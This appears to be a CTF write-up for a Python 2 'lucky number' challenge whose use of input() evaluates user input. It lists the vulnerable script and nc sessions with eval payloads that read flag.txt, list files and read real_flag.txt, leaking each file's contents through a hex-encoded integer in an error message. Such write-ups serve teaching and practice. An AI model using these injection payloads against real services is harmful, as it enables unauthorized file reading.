Pyeval 2

BioTerra CTF : Lucky Number Writeup

I learnt the Eval() vulnerability only after seeing this question and blogged about some basic exploit too.. but i was unable to get the flag , on of my senior helped me out so here it goes ..

#!/usr/bin/env python2
import logging as log
import sys
log.basicConfig(filename="lucky_number.log")

FLAG_FILE = "flag.txt"

def getSecret():
    return open(FLAG_FILE).read()

def prime_factor(n):
    i = 2
    while i * i <= n:
        if n % i:
            i += 1
        else:
            n //= i
    return n

def check_number(number):
    """
    Checks if a number is a good lucky number.
    """
    if not isinstance(number, int) or number < 1:  # condition must be false = not true 
        return False

    for i in range(3):
        number = number << i * i

    if number > 0xAAA:
        return False
    
    cor = prime_factor(number >> 3) ** 3
    
    if cor == 8 or cor == 4412:
        return False

    number = number & 0xF0F0 >> 8
    return number << 1 == cor


def main():
    sys.stdout.write("Your lucky number:")
    sys.stdout.flush()
    number = int(input(""))
    if check_number(number):
        print(getSecret())
    else:
        print("Sorry " + str(number) + " is not a good lucky number.")

if __name__ == '__main__':
    try:
        main()
    except BaseException as ex:
        log.error(str(type(ex)) + str(ex))
        print("Dafuq are you doing?")

The solution goes like this ...

 $ nc pwn.bioterra.xyz 4455

Your lucky number: eval('int(open("flag.txt").read().encode("hex"),16)')

 Sorry 337525767188140550088399172147333634157597015656050502929863081620339940171846970455466902578741092263765041199540418055192913726139466963575148968021390277031169335897610 is not a good lucky number.

decode -> 'You came here to find a flag. I have bad news: you have to dig deeper.\n'


$ nc pwn.bioterra.xyz 4455

Your lucky number:eval('int(" ".join(__import__("glob").glob("*")).encode("hex"),16)')

Sorry 1453562628065643472662079201217526249117057357179171707844479822976819718786584261355165292489996053572269641484875558843221517604363350353212944732271179892 is not a good lucky number.

decode-> 'lib flag.txt main.py dev lib64 lucky_number.log usr real_flag.txt'

$ nc pwn.bioterra.xyz 4455

Your lucky number:eval('int(open("real_flag.txt").read().encode("hex"),16)')

Sorry 42134526936706142044723527334065041550540595781765024517455445258 is not a good lucky number.

decode -> FLAG

I too first tried to sys.stdout.write(getScret()) buy as u can see that was not original flag just a troll (:
the trick used here first we have to encode the output in hex and then int ...